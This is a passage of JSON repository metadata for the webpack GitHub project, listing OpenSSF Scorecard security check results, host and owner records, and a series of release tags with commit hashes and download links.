patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg